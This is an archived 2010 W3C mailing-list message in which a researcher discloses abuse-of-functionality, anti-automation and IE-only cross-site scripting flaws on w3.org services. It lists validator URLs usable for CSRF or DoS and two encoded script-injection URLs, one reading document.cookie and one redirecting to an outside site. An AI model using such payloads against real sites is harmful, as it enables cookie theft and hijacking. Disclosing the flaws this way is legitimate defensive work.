W3C home > Mailing lists > Public > site-comments@w3.org > June 2010

Vulnerabilities at www.w3.org

From: MustLive <mustlive@websecurity.com.ua>
Date: Wed, 30 Jun 2010 09:34:56 +0000
To: <admin@w3.org>, <site-comments@w3.org>
Message-Id: <007701cb1559$d0e25e80$010000c0@ml>
Hello administrator of www.w3.org!

I want to warn you about security vulnerabilities at your site.

These are Abuse of Functionality, Insufficient Anti-automation and  
Cross-Site Scripting vulnerabilities.

Abuse of Functionality:

This functionality can be used for conducting of CSRF attacks on other  
sites.

http://validator.w3.org/feed/check.cgi?url=http://google.com

http://www.w3.org/2001/03/webdata/xsv?docAddrs=http://google.com&style=xsl

http://validator.w3.org/check?uri=http://google.com

http://jigsaw.w3.org/css-validator/validator?uri=http://google.com

http://validator.w3.org/checklink?uri=http://google.com

Note, that service W3C Link Checker can be used for scanning of whole  
site and so it consumes more resources, as of W3C's server, as of site  
which is scanning. It can be used for conducting of DoS attacks on  
mentioned servers. About such attacks I mentioned in article DoS  
attacks via Abuse of Functionality vulnerabilities (http://websecurity.com.ua/2981/ 
).

http://qa-dev.w3.org/unicorn/check?ucn_uri=google.com&ucn_task=conformance

http://www.w3.org/RDF/Validator/ARPServlet?URI=http://google.com

Insufficient Anti-automation:

At these pages there is no protection from automated requests  
(captcha). Which allows to automate process of conducting of CSRF  
attacks at other sites.

XSS (IE):

http://www.w3.org/2001/03/webdata/xsv?docAddrs=%3Cscript%3Ealert(document.cookie)%3C/script%3E&style=xsl

http://www.w3.org/2001/03/webdata/xsv?docAddrs=%3Cscript%3Edocument.location%3D%22http://websecurity.com.ua%22%3C/script%3E&style=xsl

Works only in Internet Explorer.

Attend to security of all of yours web sites, web software and to  
security audit.

I mentioned about these vulnerabilities at my site (http://websecurity.com.ua/4320/ 
).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
Received on Wednesday, 30 June 2010 12:11:33 GMT

This archive was generated by hypermail 2.2.0+W3C-0.50 : Wednesday, 24 October 2012 16:21:33 GMT